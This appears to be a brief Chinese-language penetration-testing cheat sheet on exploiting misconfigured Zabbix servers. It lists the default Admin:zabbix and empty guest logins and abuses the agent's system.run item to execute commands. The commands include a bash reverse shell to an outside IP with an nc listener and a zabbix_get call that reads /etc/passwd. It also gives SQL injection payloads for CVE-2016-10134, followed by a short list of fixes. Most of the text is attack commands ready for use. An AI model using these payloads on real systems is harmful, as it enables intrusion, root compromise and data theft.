zabbix配置不当安全事件
1.sohu的zabbix,可导致内网***
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
2.京东某站shell直入jae内网物理机内核版本过低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349

zabbix弱口令利用
zabbix默认的口令为Admin:zabbix,以及存在guest密码为空
Zabbix server可以远程在agent的机器上执行任意命令
建立监控项
system.run[command,]
这个模块是agent自带的,获取服务器shell,获取root权限。
监控项:
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'

zabbix注入利用
latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

修复建议
不要放在外网
修复默认密码
禁用guest用户
不要以root启动
401认证
备份数据-升级版本